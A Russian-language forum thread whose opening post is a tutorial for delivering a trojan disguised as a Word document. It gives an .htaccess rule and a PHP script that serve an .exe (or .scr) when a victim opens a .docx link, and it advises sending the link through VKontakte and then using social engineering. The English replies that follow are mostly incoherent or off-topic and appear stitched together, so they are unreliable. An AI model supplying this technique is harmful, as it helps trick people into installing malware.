Подмена расширений на уровне сервера или впариваем троян

[Amellian]

Поговорим про то, как можно подменить расширение на сервере/хостинге. Для чего это может быть использовано? Допустим вы хотите впарить определенному человеку трой, а человек ехе не принимает, тогда его сможет отвлечь этот метод. (Это был пример и он не побуждает вас совершать какие-либо противозаконные действия). Целей может быть множество.
Объясню вкратце: У вас на сервере находится файл с названием lol.exe, который должна скачать жертва. Скидывать ссылку вида domain/lol.exe немного палевно, пугает расширение exe, а вот ссылка вида domain/lol.docx или же domain/name.doc практически не вызывает подозрений и при переходе на domain/name.docx будет скачиваться ваш заданный файл, на нашем примере — это lol.exe. После того, как вы прочитаете статью статью до конца, то вы сможете создавать свои ссылки такого.

[HIDE=30]
1. Открываем блокнот, туда пишем:

AddType application/x-httpd-php .doc .docx
Сохраняем это, как .htaccess, затем заливаем на хостинг/сервер в корень или в ту папку, где будет находиться ваш exe файл. В моем случае — это в корень сайта. Ставим права 644 или 444.
2. Теперь нужно создать php скрипт с расширением .doc или .docx, при обращении к которому вылезет предложение скачать ваш файл. Открываем блокнот и пишем:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=имя файла’);
echo file_get_contents(‘путь к файлу’);
?>
Пример:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=lol.exe‘);
echo file_get_contents(‘http://domain/lol.exe‘);
?>
Если же вы заливаете в корень, то можно написать последнюю строчку и так:
echo file_get_contents(‘lol.exe‘);
Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.
Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.
Теперь даем жертве ссылку: http://domain/name.docx, он или она переходит и скачивает файл. Также можно ссылку скинуть вконтакте, жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.
[/HIDE]

 

[s-twister]

Yoo, I gotta agree with @CryptoKing90, it sounds like a potential server-side vulnerability if they're able to swap extensions on the fly like that. Would be super sketchy if it's a legit exploit rather than some custom malware.

 

[djek1988]

"Hey, not sure about подмена расширений на уровне сервера, but I do know some browsers allow you to specify custom extension directories. You could potentially point the malicious extension to a directory with a fake version, or even a directory that doesn't exist, and it might cause issues for the trojan."

 

[Mishechka]

"Hey, don't think a server-side extension switcher is the answer here. That's just gonna get caught in anti tamper detection and make things worse. We need something low-level, like a kernel-level hook or a firmware hack."

 

[edfdsgfdsfsdf]

"Hey, I think 'подмена расширений' (extension hijacking) is a bigger concern than a simple trojan. With browser extensions, you're giving an app permission to manipulate your browsing data, which can be exploited for phishing or malware. Anyone have some insight on how to protect ourselves?"

 

[Юлии]

idk what's going on with the translation, but it seems like you guys are talking about server-side MIME spoofing or something. Either way, I've seen some malicious actors use this tactic to phish users on websites, so it's def worth being aware of. Has anyone seen any mitigation techniques for this?

 

[DXchopper]

I'm assuming this is about server-side extension spoofing or trojan attacks? We've got some similar vulnerabilities in the past with some of the altcoins that allow for phishing attacks. Has anyone looked into implementing any form of browser-based protection to prevent this?